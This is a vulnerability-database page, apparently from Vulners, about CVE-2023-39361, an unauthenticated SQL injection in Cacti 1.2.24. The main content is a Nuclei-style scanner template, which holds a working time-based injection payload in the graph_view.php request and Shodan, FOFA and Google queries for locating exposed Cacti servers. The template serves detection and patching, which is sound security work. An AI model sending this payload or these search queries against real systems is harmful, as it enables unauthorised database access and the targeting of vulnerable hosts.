| Reporter | Title | Published | Views | Family All 67 |
|---|---|---|---|---|
| CVE-2023-39361 | 5 Sep 202320:58 | – | alpinelinux | |
| Exploit for SQL Injection in Cacti | 26 Apr 202509:18 | – | githubexploit | |
| The vulnerability of the `grow_right_pane_tree()` function in the Cacti network monitoring software, which allows a hacker to execute arbitrary SQL queries. | 13 Sep 202300:00 | – | bdu_fstec | |
| CVE-2023-39361 | 6 Sep 202300:17 | – | circl | |
| Cacti SQL Injection Vulnerability | 5 Sep 202300:00 | – | cnnvd | |
| CVE-2023-39361 | 5 Sep 202320:58 | – | cve | |
| CVE-2023-39361 Unauthenticated SQL Injection in graph_view.php in Cacti | 5 Sep 202320:58 | – | cvelist | |
| [SECURITY] [DLA 3765-1] cacti security update | 18 Mar 202418:26 | – | debian | |
| [SECURITY] [DSA 5550-1] cacti security update | 8 Nov 202322:40 | – | debian | |
| CVE-2023-39361 | 5 Sep 202320:58 | – | debiancve |
id: CVE-2023-39361
info:
name: Cacti 1.2.24 - SQL Injection
author: ritikchaddha
severity: critical
description: |
Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.
remediation: |
Apply the latest security patches and updates from the vendor to address this vulnerability.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
reference:
- https://github.com/Cacti/cacti/security/advisories/GHSA-6r43-q2fw-5wrg
- https://nvd.nist.gov/vuln/detail/CVE-2023-39361
- https://lists.fedoraproject.org/archives/list/[email protected]/message/CFH3J2WVBKY4ZJNMARVOWJQK6PSLPHFH/
- https://lists.fedoraproject.org/archives/list/[email protected]/message/WZGB2UXJEUYWWA6IWVFQ3ZTP22FIHMGN/
- https://lists.fedoraproject.org/archives/list/[email protected]/message/WOQFYGLZBAWT4AWNMO7DU73QXWPXTCKH/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-39361
cwe-id: CWE-89
epss-score: 0.87575
epss-percentile: 0.99736
cpe: cpe:2.3:a:cacti:cacti:1.2.24:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: cacti
product: cacti
shodan-query:
- title:"Login to Cacti"
- http.title:"login to cacti"
- http.title:"cacti"
- http.favicon.hash:"-1797138069"
fofa-query:
- icon_hash="-1797138069"
- title="cacti"
- title="login to cacti"
google-query:
- intitle:"cacti"
- intitle:"login to cacti"
tags: time-based-sqli,cve2023,cve,cacti,sqli,vuln
http:
- raw:
- |
@timeout: 20s
GET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3D%22%28%28%22%29%29%3BSELECT+SLEEP%2810%29%3B--+- HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=10'
- 'status_code == 200'
- 'contains_all(body, "Tree Mode", "cacti")'
condition: and
# digest: 490a00463044022060eed3c5283094185ff4341fab3dd26fd19db3c2e21638130f5fe758cfe56e2002205c396a021e1ad3377f3a6b3a85190dbcf0d41596ce325265100e95cf1ff01214:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation